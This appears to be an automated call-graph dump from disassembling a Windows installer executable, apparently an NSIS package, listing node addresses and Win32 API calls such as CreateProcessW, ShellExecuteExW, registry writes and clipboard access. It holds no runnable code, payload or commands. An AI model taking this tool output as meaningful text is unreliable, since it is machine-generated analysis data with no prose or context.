GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4425->4427 4428 6fe81c41 ExitProcess 4425->4428 4429 405550 4430 405560 4429->4430 4431 405574 4429->4431 4433 405566 4430->4433 4434 4055bd 4430->4434 4432 40557c IsWindowVisible 4431->4432 4440 405593 4431->4440 4432->4434 4436 405589 4432->4436 4435 404522 SendMessageW 4433->4435 4437 4055c2 CallWindowProcW 4434->4437 4438 405570 4435->4438 4439 404e91 5 API calls 4436->4439 4437->4438 4439->4440 4440->4437 4441 404f11 4 API calls 4440->4441 4441->4434 4442 4016d1 4443 402dab 21 API calls 4442->4443 4444 4016d7 GetFullPathNameW 4443->4444 4445 4016f1 4444->4445 4451 401713 4444->4451 4448 4068b4 2 API calls 4445->4448 4445->4451 4446 401728 GetShortPathNameW 4447 402c2f 4446->4447 4449 401703 4448->4449 4449->4451 4452 406557 lstrcpynW 4449->4452 4451->4446 4451->4447 4452->4451 4453 401e53 GetDC 4454 402d89 21 API calls 4453->4454 4455 401e65 GetDeviceCaps MulDiv ReleaseDC 4454->4455 4456 402d89 21 API calls 4455->4456 4457 401e96 4456->4457 4458 406594 21 API calls 4457->4458 4459 401ed3 CreateFontIndirectW 4458->4459 4460 40263d 4459->4460 4461 402955 4462 402dab 21 API calls 4461->4462 4463 402961 4462->4463 4464 402977 4463->4464 4465 402dab 21 API calls 4463->4465 4466 406022 2 API calls 4464->4466 4465->4464 4467 40297d 4466->4467 4489 406047 GetFileAttributesW CreateFileW 4467->4489 4469 40298a 4470 402a40 4469->4470 4473 4029a5 GlobalAlloc 4469->4473 4474 402a28 4469->4474 4471 402a47 DeleteFileW 4470->4471 4472 402a5a 4470->4472 4471->4472 4473->4474 4475 4029be 4473->4475 4476 4032b9 35 API calls 4474->4476 4490 4034ea SetFilePointer 4475->4490 4478 402a35 CloseHandle 4476->4478 4478->4470 4479 4029c4 4480 4034d4 ReadFile 4479->4480 4481 4029cd GlobalAlloc 4480->4481 4482 402a11 4481->4482 4483 4029dd 4481->4483 4485 4060f9 WriteFile 4482->4485 4484 4032b9 35 API calls 4483->4484 4487 4029ea 4484->4487 4486 402a1d GlobalFree 4485->4486 4486->4474 4488 402a08 GlobalFree 4487->4488 4488->4482 4489->4469 4490->4479 4026 403fd7 4027 404150 4026->4027 4028 403fef 4026->4028 4030 404161 GetDlgItem GetDlgItem 4027->4030 4031 4041a1 4027->4031 4028->4027 4029 403ffb 4028->4029 4033 404006 SetWindowPos 4029->4033 4034 404019 4029->4034 4035 4044d6 22 API calls 4030->4035 4032 4041fb 4031->4032 4040 401389 2 API calls 4031->4040 4036 404522 SendMessageW 4032->4036 4053 40414b 4032->4053 4033->4034 4037 404022 ShowWindow 4034->4037 4038 404064 4034->4038 4039 40418b SetClassLongW 4035->4039 4089 40420d 4036->4089 4041 404042 GetWindowLongW 4037->4041 4042 40413d 4037->4042 4043 404083 4038->4043 4044 40406c DestroyWindow 4038->4044 4045 40140b 2 API calls 4039->4045 4048 4041d3 4040->4048 4041->4042 4050 40405b ShowWindow 4041->4050 4108 40453d 4042->4108 4046 404088 SetWindowLongW 4043->4046 4047 404099 4043->4047 4098 40445f 4044->4098 4045->4031 4046->4053 4047->4042 4051 4040a5 GetDlgItem 4047->4051 4048->4032 4052 4041d7 SendMessageW 4048->4052 4050->4038 4056 4040b6 SendMessageW IsWindowEnabled 4051->4056 4059 4040d3 4051->4059 4052->4053 4054 40140b 2 API calls 4054->4089 4055 404461 DestroyWindow EndDialog 4055->4098 4056->4053 4056->4059 4057 404490 ShowWindow 4057->4053 4058 406594 21 API calls 4058->4089 4060 4040d8 4059->4060 4061 4040e0 4059->4061 4064 404127 SendMessageW 4059->4064 4065 4040f3 4059->4065 4105 4044af 4060->4105 4061->4060 4061->4064 4063 4044d6 22 API calls 4063->4089 4064->4042 4067 404110 4065->4067 4068 4040fb 4065->4068 4066 40410e 4066->4042 4069 40140b 2 API calls 4067->4069 4070 40140b 2 API calls 4068->4070 4071 404117 4069->4071 4070->4060 4071->4042 4071->4060 4073 404288 GetDlgItem 4074 4042a5 ShowWindow KiUserCallbackDispatcher 4073->4074 4075 40429d 4073->4075 4102 4044f8 KiUserCallbackDispatcher 4074->4102 4075->4074 4077 4042cf EnableWindow 4082 4042e3 4077->4082 4078 4042e8 GetSystemMenu EnableMenuItem SendMessageW 4079 404318 SendMessageW 4078->4079 4078->4082 4079->4082 4081 403fb8 22 API calls 4081->4082 4082->4078 4082->4081 4103 40450b SendMessageW 4082->4103 4104 406557 lstrcpynW 4082->4104 4084 404347 lstrlenW 4085 406594 21 API calls 4084->4085 4086 40435d SetWindowTextW 4085->4086 4087 401389 2 API calls 4086->4087 4087->4089 4088 4043a1 DestroyWindow 4090 4043bb CreateDialogParamW 4088->4090 4088->4098 4089->4053 4089->4054 4089->4055 4089->4058 4089->4063 4089->4088 4099 4044d6 4089->4099 4091 4043ee 4090->4091 4090->4098 4092 4044d6 22 API calls 4091->4092 4093 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4092->4093 4094 401389 2 API calls 4093->4094 4095 40443f 4094->4095 4095->4053 4096 404447 ShowWindow 4095->4096 4097 404522 SendMessageW 4096->4097 4097->4098 4098->4053 4098->4057 4100 406594 21 API calls 4099->4100 4101 4044e1 SetDlgItemTextW 4100->4101 4101->4073 4102->4077 4103->4082 4104->4084 4106 4044b6 4105->4106 4107 4044bc SendMessageW 4105->4107 4106->4107 4107->4066 4109 404555 GetWindowLongW 4108->4109 4119 404600 4108->4119 4110 40456a 4109->4110 4109->4119 4111 404597 GetSysColor 4110->4111 4112 40459a 4110->4112 4110->4119 4111->4112 4113 4045a0 SetTextColor 4112->4113 4114 4045aa SetBkMode 4112->4114 4113->4114 4115 4045c2 GetSysColor 4114->4115 4116 4045c8 4114->4116 4115->4116 4117 4045d9 4116->4117 4118 4045cf SetBkColor 4116->4118 4117->4119 4120 4045f3 CreateBrushIndirect 4117->4120 4121 4045ec DeleteObject 4117->4121 4118->4117 4119->4053 4120->4119 4121->4120 4491 4014d7 4492 402d89 21 API calls 4491->4492 4493 4014dd Sleep 4492->4493 4495 402c2f 4493->4495 4496 40195b 4497 402dab 21 API calls 4496->4497 4498 401962 lstrlenW 4497->4498 4499 40263d 4498->4499 4207 4020dd 4208 4020ef 4207->4208 4218 4021a1 4207->4218 4209 402dab 21 API calls 4208->4209 4211 4020f6 4209->4211 4210 401423 28 API calls 4216 4022fb 4210->4216 4212 402dab 21 API calls 4211->4212 4213 4020ff 4212->4213 4214 402115 LoadLibraryExW 4213->4214 4215 402107 GetModuleHandleW 4213->4215 4217 402126 4214->4217 4214->4218 4215->4214 4215->4217 4227 4069ba 4217->4227 4218->4210 4221 402170 4223 4055dc 28 API calls 4221->4223 4222 402137 4224 401423 28 API calls 4222->4224 4225 402147 4222->4225 4223->4225 4224->4225 4225->4216 4226 402193 FreeLibrary 4225->4226 4226->4216 4232 406579 WideCharToMultiByte 4227->4232 4229 4069d7 4230 4069de GetProcAddress 4229->4230 4231 402131 4229->4231 4230->4231 4231->4221 4231->4222 4232->4229 4500 402b5e 4501 402bb0 4500->4501 4502 402b65 4500->4502 4503 40694b 5 API calls 4501->4503 4505 402d89 21 API calls 4502->4505 4508 402bae 4502->4508 4504 402bb7 4503->4504 4506 402dab 21 API calls 4504->4506 4507 402b73 4505->4507 4509 402bc0 4506->4509 4510 402d89 21 API calls 4507->4510 4509->4508 4511 402bc4 IIDFromString 4509->4511 4514 402b7f 4510->4514 4511->4508 4512 402bd3 4511->4512 4512->4508 4518 406557 lstrcpynW 4512->4518 4517 40649e wsprintfW 4514->4517 4515 402bf0 CoTaskMemFree 4515->4508 4517->4508 4518->4515 3264 401761 3270 402dab 3264->3270 3268 40176f 3269 406076 2 API calls 3268->3269 3269->3268 3271 402db7 3270->3271 3272 406594 21 API calls 3271->3272 3273 402dd8 3272->3273 3274 401768 3273->3274 3275 406805 5 API calls 3273->3275 3276 406076 3274->3276 3275->3274 3277 406083 GetTickCount GetTempFileNameW 3276->3277 3278 4060bd 3277->3278 3279 4060b9 3277->3279 3278->3268 3279->3277 3279->3278 4519 401d62 4520 402d89 21 API calls 4519->4520 4521 401d73 SetWindowLongW 4520->4521 4522 402c2f 4521->4522 4523 4028e3 4524 4028eb 4523->4524 4525 4028ef FindNextFileW 4524->4525 4528 402901 4524->4528 4526 402948 4525->4526 4525->4528 4529 406557 lstrcpynW 4526->4529 4529->4528 4530 403be7 4531 403bf2 4530->4531 4532 403bf6 4531->4532 4533 403bf9 GlobalAlloc 4531->4533 4533->4532 4534 401568 4535 402ba9 4534->4535 4538 40649e wsprintfW 4535->4538 4537 402bae 4538->4537 4539 40196d 4540 402d89 21 API calls 4539->4540 4541 401974 4540->4541 4542 402d89 21 API calls 4541->4542 4543 401981 4542->4543 4544 402dab 21 API calls 4543->4544 4545 401998 lstrlenW 4544->4545 4547 4019a9 4545->4547 4546 4019ea 4547->4546 4551 406557 lstrcpynW 4547->4551 4549 4019da 4549->4546 4550 4019df lstrlenW 4549->4550 4550->4546 4551->4549 4552 40166f 4553 402dab 21 API calls 4552->4553 4554 401675 4553->4554 4555 4068b4 2 API calls 4554->4555 4556 40167b 4555->4556 4557 402af0 4558 402d89 21 API calls 4557->4558 4559 402af6 4558->4559 4560 406594 21 API calls 4559->4560 4561 402933 4559->4561 4560->4561 4562 4026f1 4563 402d89 21 API calls 4562->4563 4570 402700 4563->4570 4564 40274a ReadFile 4564->4570 4574 40283d 4564->4574 4565 4060ca ReadFile 4565->4570 4566 406128 5 API calls 4566->4570 4567 40278a MultiByteToWideChar 4567->4570 4568 40283f 4575 40649e wsprintfW 4568->4575 4570->4564 4570->4565 4570->4566 4570->4567 4570->4568 4571 4027b0 SetFilePointer MultiByteToWideChar 4570->4571 4572 402850 4570->4572 4570->4574 4571->4570 4573 402871 SetFilePointer 4572->4573 4572->4574 4573->4574 4575->4574 3985 401774 3986 402dab 21 API calls 3985->3986 3987 40177b 3986->3987 3988 4017a3 3987->3988 3989 40179b 3987->3989 4025 406557 lstrcpynW 3988->4025 4024 406557 lstrcpynW 3989->4024 3992 4017a1 3996 406805 5 API calls 3992->3996 3993 4017ae 3994 405e26 3 API calls 3993->3994 3995 4017b4 lstrcatW 3994->3995 3995->3992 4012 4017c0 3996->4012 3997 4068b4 2 API calls 3997->4012 3998 406022 2 API calls 3998->4012 4000 4017d2 CompareFileTime 4000->4012 4001 401892 4003 4055dc 28 API calls 4001->4003 4002 401869 4004 4055dc 28 API calls 4002->4004 4014 40187e 4002->4014 4006 40189c 4003->4006 4004->4014 4005 406557 lstrcpynW 4005->4012 4007 4032b9 35 API calls 4006->4007 4008 4018af 4007->4008 4009 4018c3 SetFileTime 4008->4009 4011 4018d5 CloseHandle 4008->4011 4009->4011 4010 406594 21 API calls 4010->4012 4013 4018e6 4011->4013 4011->4014 4012->3997 4012->3998 4012->4000 4012->4001 4012->4002 4012->4005 4012->4010 4020 405bb7 MessageBoxIndirectW 4012->4020 4023 406047 GetFileAttributesW CreateFileW 4012->4023 4015 4018eb 4013->4015 4016 4018fe 4013->4016 4018 406594 21 API calls 4015->4018 4017 406594 21 API calls 4016->4017 4019 401906 4017->4019 4021 4018f3 lstrcatW 4018->4021 4022 405bb7 MessageBoxIndirectW 4019->4022 4020->4012 4021->4019 4022->4014 4023->4012 4024->3992 4025->3993 4579 4014f5 SetForegroundWindow 4580 402c2f 4579->4580 4581 401a77 4582 402d89 21 API calls 4581->4582 4583 401a80 4582->4583 4584 402d89 21 API calls 4583->4584 4585 401a25 4584->4585 4586 401578 4587 401591 4586->4587 4588 401588 ShowWindow 4586->4588 4589 402c2f 4587->4589 4590 40159f ShowWindow 4587->4590 4588->4587 4590->4589 4591 4023f9 4592 402dab 21 API calls 4591->4592 4593 402408 4592->4593 4594 402dab 21 API calls 4593->4594 4595 402411 4594->4595 4596 402dab 21 API calls 4595->4596 4597 40241b GetPrivateProfileStringW 4596->4597 4598 401ffb 4599 402dab 21 API calls 4598->4599 4600 402002 4599->4600 4601 4068b4 2 API calls 4600->4601 4602 402008 4601->4602 4604 402019 4602->4604 4605 40649e wsprintfW 4602->4605 4605->4604 4606 401b7c 4607 402dab 21 API calls 4606->4607 4608 401b83 4607->4608 4609 402d89 21 API calls 4608->4609 4610 401b8c wsprintfW 4609->4610 4611 402c2f 4610->4611 4233 405b7d ShellExecuteExW 4612 401000 4613 401037 BeginPaint GetClientRect 4612->4613 4614 40100c DefWindowProcW 4612->4614 4616 4010f3 4613->4616 4617 401179 4614->4617 4618 401073 CreateBrushIndirect FillRect DeleteObject 4616->4618 4619 4010fc 4616->4619 4618->4616 4620 401102 CreateFontIndirectW 4619->4620 4621 401167 EndPaint 4619->4621 4620->4621 4622 401112 6 API calls 4620->4622 4621->4617 4622->4621 4623 404980 4624 404990 4623->4624 4625 4049b6 4623->4625 4626 4044d6 22 API calls 4624->4626 4627 40453d 8 API calls 4625->4627 4628 40499d SetDlgItemTextW 4626->4628 4629 4049c2 4627->4629 4628->4625 4630 401680 4631 402dab 21 API calls 4630->4631 4632 401687 4631->4632 4633 402dab 21 API calls 4632->4633 4634 401690 4633->4634 4635 402dab 21 API calls 4634->4635 4636 401699 MoveFileW 4635->4636 4637 4016ac 4636->4637 4643 4016a5 4636->4643 4638 4068b4 2 API calls 4637->4638 4640 4022fb 4637->4640 4641 4016bb 4638->4641 4639 401423 28 API calls 4639->4640 4641->4640 4642 406317 40 API calls 4641->4642 4642->4643 4643->4639 4644 401503 4645 401508 4644->4645 4646 401520 4644->4646 4647 402d89 21 API calls 4645->4647 4647->4646 3300 402304 3301 402dab 21 API calls 3300->3301 3302 40230a 3301->3302 3303 402dab 21 API calls 3302->3303 3304 402313 3303->3304 3305 402dab 21 API calls 3304->3305 3306 40231c 3305->3306 3315 4068b4 FindFirstFileW 3306->3315 3309 402336 lstrlenW lstrlenW 3312 4055dc 28 API calls 3309->3312 3310 402329 3314 402331 3310->3314 3318 4055dc 3310->3318 3313 402374 SHFileOperationW 3312->3313 3313->3310 3313->3314 3316 402325 3315->3316 3317 4068ca FindClose 3315->3317 3316->3309 3316->3310 3317->3316 3320 4055f7 3318->3320 3328 405699 3318->3328 3319 405613 lstrlenW 3322 405621 lstrlenW 3319->3322 3323 40563c 3319->3323 3320->3319 3321 406594 21 API calls 3320->3321 3321->3319 3326 405633 lstrcatW 3322->3326 3322->3328 3324 405642 SetWindowTextW 3323->3324 3325 40564f 3323->3325 3324->3325 3327 405655 SendMessageW SendMessageW SendMessageW 3325->3327 3325->3328 3326->3323 3327->3328 3328->3314 4648 401a04 4649 402dab 21 API calls 4648->4649 4650 401a0b 4649->4650 4651 402dab 21 API calls 4650->4651 4652 401a14 4651->4652 4653 401a1b lstrcmpiW 4652->4653 4654 401a2d lstrcmpW 4652->4654 4655 401a21 4653->4655 4654->4655 4656 6fe8102d 4657 6fe81096 71 API calls 4656->4657 4658 6fe81058 4657->4658 4659 401d86 4660 401d99 GetDlgItem 4659->4660 4661 401d8c 4659->4661 4662 401d93 4660->4662 4663 402d89 21 API calls 4661->4663 4664 401dda GetClientRect LoadImageW SendMessageW 4662->4664 4665 402dab 21 API calls 4662->4665 4663->4662 4667 401e44 4664->4667 4668 401e38 4664->4668 4665->4664 4668->4667 4669 401e3d DeleteObject 4668->4669 4669->4667 4670 402388 4671 4023a2 4670->4671 4672 40238f 4670->4672 4673 406594 21 API calls 4672->4673 4674 40239c 4673->4674 4675 405bb7 MessageBoxIndirectW 4674->4675 4675->4671 4676 402c0a SendMessageW 4677 402c24 InvalidateRect 4676->4677 4678 402c2f 4676->4678 4677->4678 4679 40460c lstrcpynW lstrlenW 3661 40248f 3662 402dab 21 API calls 3661->3662 3663 4024a1 3662->3663 3664 402dab 21 API calls 3663->3664 3665 4024ab 3664->3665 3678 402e3b 3665->3678 3668 4024e3 3670 4024ef 3668->3670 3673 402d89 21 API calls 3668->3673 3669 402dab 21 API calls 3672 4024d9 lstrlenW 3669->3672 3674 40250e RegSetValueExW 3670->3674 3682 4032b9 3670->3682 3671 402933 3672->3668 3673->3670 3675 402524 RegCloseKey 3674->3675 3675->3671 3679 402e56 3678->3679 3702 4063f2 3679->3702 3684 4032d2 3682->3684 3683 403300 3706 4034d4 3683->3706 3684->3683 3709 4034ea SetFilePointer 3684->3709 3688 40346d 3690 4034af 3688->3690 3695 403471 3688->3695 3689 40331d GetTickCount 3691 403457 3689->3691 3698 40336c 3689->3698 3693 4034d4 ReadFile 3690->3693 3691->3674 3692 4034d4 ReadFile 3692->3698 3693->3691 3694 4034d4 ReadFile 3694->3695 3695->3691 3695->3694 3696 4060f9 WriteFile 3695->3696 3696->3695 3697 4033c2 GetTickCount 3697->3698 3698->3691 3698->3692 3698->3697 3699 4033e7 MulDiv wsprintfW 3698->3699 3701 4060f9 WriteFile 3698->3701 3700 4055dc 28 API calls 3699->3700 3700->3698 3701->3698 3703 406401 3702->3703 3704 40640c RegCreateKeyExW 3703->3704 3705 4024bb 3703->3705 3704->3705 3705->3668 3705->3669 3705->3671 3707 4060ca ReadFile 3706->3707 3708 40330b 3707->3708 3708->3688 3708->3689 3708->3691 3709->3683 3728 402910 3729 402dab 21 API calls 3728->3729 3730 402917 FindFirstFileW 3729->3730 3731 40292a 3730->3731 3732 40293f 3730->3732 3736 40649e wsprintfW 3732->3736 3734 402948 3737 406557 lstrcpynW 3734->3737 3736->3734 3737->3731 4680 401911 4681 401948 4680->4681 4682 402dab 21 API calls 4681->4682 4683 40194d 4682->4683 4684 405c63 71 API calls 4683->4684 4685 401956 4684->4685 4686 401491 4687 4055dc 28 API calls 4686->4687 4688 401498 4687->4688 4689 401914 4690 402dab 21 API calls 4689->4690 4691 40191b 4690->4691 4692 405bb7 MessageBoxIndirectW 4691->4692 4693 401924 4692->4693 4694 404695 4695 4046ad 4694->4695 4698 4047c7 4694->4698 4699 4044d6 22 API calls 4695->4699 4696 404831 4697 40483b GetDlgItem 4696->4697 4700 4048fb 4696->4700 4701 404855 4697->4701 4702 4048bc 4697->4702 4698->4696 4698->4700 4703 404802 GetDlgItem SendMessageW 4698->4703 4704 404714 4699->4704 4705 40453d 8 API calls 4700->4705 4701->4702 4710 40487b SendMessageW LoadCursorW SetCursor 4701->4710 4702->4700 4706 4048ce 4702->4706 4727 4044f8 KiUserCallbackDispatcher 4703->4727 4708 4044d6 22 API calls 4704->4708 4709 4048f6 4705->4709 4711 4048e4 4706->4711 4712 4048d4 SendMessageW 4706->4712 4714 404721 CheckDlgButton 4708->4714 4728 404944 4710->4728 4711->4709 4716 4048ea SendMessageW 4711->4716 4712->4711 4713 40482c 4717 404920 SendMessageW 4713->4717 4725 4044f8 KiUserCallbackDispatcher 4714->4725 4716->4709 4717->4696 4720 40473f GetDlgItem 4726 40450b SendMessageW 4720->4726 4722 404755 SendMessageW 4723 404772 GetSysColor 4722->4723 4724 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4722->4724 4723->4724 4724->4709 4725->4720 4726->4722 4727->4713 4731 405b7d ShellExecuteExW 4728->4731 4730 4048aa LoadCursorW SetCursor 4730->4702 4731->4730 4732 402896 4733 40289d 4732->4733 4734 402bae 4732->4734 4735 402d89 21 API calls 4733->4735 4736 4028a4 4735->4736 4737 4028b3 SetFilePointer 4736->4737 4737->4734 4738 4028c3 4737->4738 4740 40649e wsprintfW 4738->4740 4740->4734 4741 401f17 4742 402dab 21 API calls 4741->4742 4743 401f1d 4742->4743 4744 402dab 21 API calls 4743->4744 4745 401f26 4744->4745 4746 402dab 21 API calls 4745->4746 4747 401f2f 4746->4747 4748 402dab 21 API calls 4747->4748 4749 401f38 4748->4749 4750 401423 28 API calls 4749->4750 4751 401f3f 4750->4751 4758 405b7d ShellExecuteExW 4751->4758 4753 401f87 4754 4069f6 5 API calls 4753->4754 4756 402933 4753->4756 4755 401fa4 CloseHandle 4754->4755 4755->4756 4758->4753 4759 402f98 4760 402faa SetTimer 4759->4760 4762 402fc3 4759->4762 4760->4762 4761 403018 4762->4761 4763 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4762->4763 4763->4761 4157 40571b 4158 4058c5 4157->4158 4159 40573c GetDlgItem GetDlgItem GetDlgItem 4157->4159 4161 4058f6 4158->4161 4162 4058ce GetDlgItem CreateThread CloseHandle 4158->4162 4203 40450b SendMessageW 4159->4203 4164 405921 4161->4164 4166 405946 4161->4166 4167 40590d ShowWindow ShowWindow 4161->4167 4162->4161 4206 4056af 5 API calls 4162->4206 4163 4057ac 4172 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4163->4172 4165 40592d 4164->4165 4173 405981 4164->4173 4169 405935 4165->4169 4170 40595b ShowWindow 4165->4170 4171 40453d 8 API calls 4166->4171 4205 40450b SendMessageW 4167->4205 4174 4044af SendMessageW 4169->4174 4176 40597b 4170->4176 4177 40596d 4170->4177 4175 405954 4171->4175 4178 405821 4172->4178 4179 405805 SendMessageW SendMessageW 4172->4179 4173->4166 4180 40598f SendMessageW 4173->4180 4174->4166 4185 4044af SendMessageW 4176->4185 4184 4055dc 28 API calls 4177->4184 4181 405834 4178->4181 4182 405826 SendMessageW 4178->4182 4179->4178 4180->4175 4183 4059a8 CreatePopupMenu 4180->4183 4187 4044d6 22 API calls 4181->4187 4182->4181 4186 406594 21 API calls 4183->4186 4184->4176 4185->4173 4188 4059b8 AppendMenuW 4186->4188 4189 405844 4187->4189 4190 4059d5 GetWindowRect 4188->4190 4191 4059e8 TrackPopupMenu 4188->4191 4192 405881 GetDlgItem SendMessageW 4189->4192 4193 40584d ShowWindow 4189->4193 4190->4191 4191->4175 4194 405a03 4191->4194 4192->4175 4196 4058a8 SendMessageW SendMessageW 4192->4196 4195 405863 ShowWindow 4193->4195 4198 405870 4193->4198 4197 405a1f SendMessageW 4194->4197 4195->4198 4196->4175 4197->4197 4199 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4197->4199 4204 40450b SendMessageW 4198->4204 4201 405a61 SendMessageW 4199->4201 4201->4201 4202 405a8a GlobalUnlock SetClipboardData CloseClipboard 4201->4202 4202->4175 4203->4163 4204->4192 4205->4164 4764 401d1c 4765 402d89 21 API calls 4764->4765 4766 401d22 IsWindow 4765->4766 4767 401a25 4766->4767 4768 404d1d 4769 404d49 4768->4769 4770 404d2d 4768->4770 4771 404d7c 4769->4771 4772 404d4f SHGetPathFromIDListW 4769->4772 4779 405b9b GetDlgItemTextW 4770->4779 4774 404d5f 4772->4774 4778 404d66 SendMessageW 4772->4778 4776 40140b 2 API calls 4774->4776 4775 404d3a SendMessageW 4775->4769 4776->4778 4778->4771 4779->4775 4780 40149e 4781 4023a2 4780->4781 4782 4014ac PostQuitMessage 4780->4782 4782->4781 3186 401ba0 3187 401bf1 3186->3187 3188 401bad 3186->3188 3189 401bf6 3187->3189 3190 401c1b GlobalAlloc 3187->3190 3191 401c36 3188->3191 3196 401bc4 3188->3196 3204 4023a2 3189->3204 3224 406557 lstrcpynW 3189->3224 3205 406594 3190->3205 3193 406594 21 API calls 3191->3193 3191->3204 3195 40239c 3193->3195 3225 405bb7 3195->3225 3222 406557 lstrcpynW 3196->3222 3197 401c08 GlobalFree 3197->3204 3200 401bd3 3223 406557 lstrcpynW 3200->3223 3202 401be2 3229 406557 lstrcpynW 3202->3229 3220 40659f 3205->3220 3206 4067e6 3207 4067ff 3206->3207 3252 406557 lstrcpynW 3206->3252 3207->3191 3209 4067b7 lstrlenW 3209->3220 3210 406594 15 API calls 3210->3209 3214 4066b0 GetSystemDirectoryW 3214->3220 3215 4066c6 GetWindowsDirectoryW 3215->3220 3216 406758 lstrcatW 3216->3220 3218 406594 15 API calls 3218->3220 3220->3206 3220->3209 3220->3210 3220->3214 3220->3215 3220->3216 3220->3218 3221 406728 SHGetPathFromIDListW CoTaskMemFree 3220->3221 3230 406425 3220->3230 3235 40694b GetModuleHandleA 3220->3235 3241 406805 3220->3241 3250 40649e wsprintfW 3220->3250 3251 406557 lstrcpynW 3220->3251 3221->3220 3222->3200 3223->3202 3224->3197 3228 405bcc 3225->3228 3226 405c18 3226->3204 3227 405be0 MessageBoxIndirectW 3227->3226 3228->3226 3228->3227 3229->3204 3253 4063c4 3230->3253 3233 406489 3233->3220 3234 406459 RegQueryValueExW RegCloseKey 3234->3233 3236 406971 GetProcAddress 3235->3236 3237 406967 3235->3237 3238 406980 3236->3238 3257 4068db GetSystemDirectoryW 3237->3257 3238->3220 3240 40696d 3240->3236 3240->3238 3247 406812 3241->3247 3242 406888 3243 40688d CharPrevW 3242->3243 3245 4068ae 3242->3245 3243->3242 3244 40687b CharNextW 3244->3242 3244->3247 3245->3220 3247->3242 3247->3244 3248 406867 CharNextW 3247->3248 3249 406876 CharNextW 3247->3249 3260 405e53 3247->3260 3248->3247 3249->3244 3250->3220 3251->3220 3252->3207 3254 4063d3 3253->3254 3255 4063d7 3254->3255 3256 4063dc RegOpenKeyExW 3254->3256 3255->3233 3255->3234 3256->3255 3258 4068fd wsprintfW LoadLibraryExW 3257->3258 3258->3240 3261 405e59 3260->3261 3262 405e6f 3261->3262 3263 405e60 CharNextW 3261->3263 3262->3247 3263->3261 4783 402621 4784 402dab 21 API calls 4783->4784 4785 402628 4784->4785 4788 406047 GetFileAttributesW CreateFileW 4785->4788 4787 402634 4788->4787 3280 4025a3 3292 402deb 3280->3292 3284 4025b6 3285 4025c5 3284->3285 3290 402933 3284->3290 3286 4025d2 RegEnumKeyW 3285->3286 3287 4025de RegEnumValueW 3285->3287 3288 4025fa RegCloseKey 3286->3288 3287->3288 3289 4025f3 3287->3289 3288->3290 3289->3288 3293 402dab 21 API calls 3292->3293 3294 402e02 3293->3294 3295 4063c4 RegOpenKeyExW 3294->3295 3296 4025ad 3295->3296 3297 402d89 3296->3297 3298 406594 21 API calls 3297->3298 3299 402d9e 3298->3299 3299->3284 3512 6fe81000 3515 6fe81096 3512->3515 3593 6fe81987 GetCurrentProcess GetModuleHandleA GetProcAddress 3515->3593 3518 6fe810e8 GetModuleFileNameW GlobalAlloc 3520 6fe8112f 3518->3520 3519 6fe8122d GlobalAlloc 3521 6fe81247 3519->3521 3522 6fe8114f 3520->3522 3523 6fe81135 CharPrevW 3520->3523 3524 6fe8125f FindWindowExW FindWindowExW 3521->3524 3535 6fe8127e 3521->3535 3525 6fe81159 3522->3525 3526 6fe8116f GetTempFileNameW 3522->3526 3523->3520 3523->3522 3524->3535 3609 6fe81c8c 3525->3609 3530 6fe8119e 3526->3530 3533 6fe8120b lstrcatW lstrlenW 3530->3533 3536 6fe811b6 CreateFileMappingW MapViewOfFile 3530->3536 3531 6fe8102b 3533->3521 3534 6fe812aa lstrcmpiW 3534->3535 3537 6fe812bf lstrcmpiW 3534->3537 3535->3534 3598 6fe81c4c 3535->3598 3603 6fe81a61 lstrlenW lstrlenW 3535->3603 3538 6fe811fd CloseHandle CloseHandle 3536->3538 3539 6fe811d7 UnmapViewOfFile 3536->3539 3537->3535 3540 6fe812d7 3537->3540 3538->3533 3539->3538 3541 6fe81308 GetVersion 3540->3541 3542 6fe812dc 3540->3542 3544 6fe81390 GlobalAlloc 3541->3544 3545 6fe813c7 3541->3545 3543 6fe81c8c 2 API calls 3542->3543 3548 6fe812e6 3543->3548 3551 6fe81484 lstrcpyW 3544->3551 3553 6fe813c4 3544->3553 3546 6fe813fe CreatePipe 3545->3546 3547 6fe813d5 InitializeSecurityDescriptor SetSecurityDescriptorDacl 3545->3547 3546->3551 3552 6fe81417 CreatePipe 3546->3552 3547->3546 3556 6fe81300 3548->3556 3557 6fe812f7 DeleteFileW 3548->3557 3555 6fe8175f 3551->3555 3552->3551 3554 6fe8142a GetStartupInfoW CreateProcessW 3552->3554 3553->3545 3554->3551 3560 6fe8149b GetTickCount 3554->3560 3558 6fe8176f 3555->3558 3559 6fe81767 3555->3559 3556->3541 3557->3556 3562 6fe81787 3558->3562 3564 6fe8177c 3558->3564 3561 6fe81c8c 2 API calls 3559->3561 3563 6fe814a4 WaitForSingleObject GetExitCodeProcess 3560->3563 3561->3558 3565 6fe81790 lstrcpyW 3562->3565 3566 6fe817a2 3562->3566 3567 6fe814c4 PeekNamedPipe 3563->3567 3568 6fe81a01 3 API calls 3564->3568 3565->3566 3569 6fe817ab wsprintfW 3566->3569 3570 6fe817c3 3566->3570 3571 6fe8170a 3567->3571 3572 6fe814de GetTickCount ReadFile 3567->3572 3573 6fe81785 3568->3573 3569->3570 3574 6fe81c8c 2 API calls 3570->3574 3571->3555 3576 6fe8174a Sleep 3571->3576 3577 6fe81716 GetTickCount 3571->3577 3575 6fe81520 3572->3575 3573->3562 3578 6fe817cf 6 API calls 3574->3578 3575->3563 3575->3567 3579 6fe81524 IsTextUnicode 3575->3579 3585 6fe81597 IsDBCSLeadByteEx 3575->3585 3586 6fe815b6 MultiByteToWideChar 3575->3586 3587 6fe815ec lstrcpyW 3575->3587 3588 6fe81672 GlobalReAlloc 3575->3588 3612 6fe81a01 3575->3612 3615 6fe8182a 3575->3615 3619 6fe81948 3575->3619 3576->3563 3577->3576 3580 6fe81725 TerminateProcess lstrcpyW 3577->3580 3581 6fe817fe 3578->3581 3579->3575 3580->3563 3582 6fe81810 GlobalFree 3581->3582 3583 6fe81807 DeleteFileW 3581->3583 3582->3531 3584 6fe81820 GlobalFree 3582->3584 3583->3582 3584->3531 3585->3575 3585->3586 3586->3575 3587->3575 3588->3575 3590 6fe816ec lstrcpyW 3588->3590 3590->3563 3594 6fe819dd GetProcAddress 3593->3594 3595 6fe819c3 3593->3595 3596 6fe810e0 3594->3596 3597 6fe819ec 3594->3597 3595->3594 3595->3596 3596->3518 3596->3519 3597->3596 3599 6fe81c85 3598->3599 3600 6fe81c56 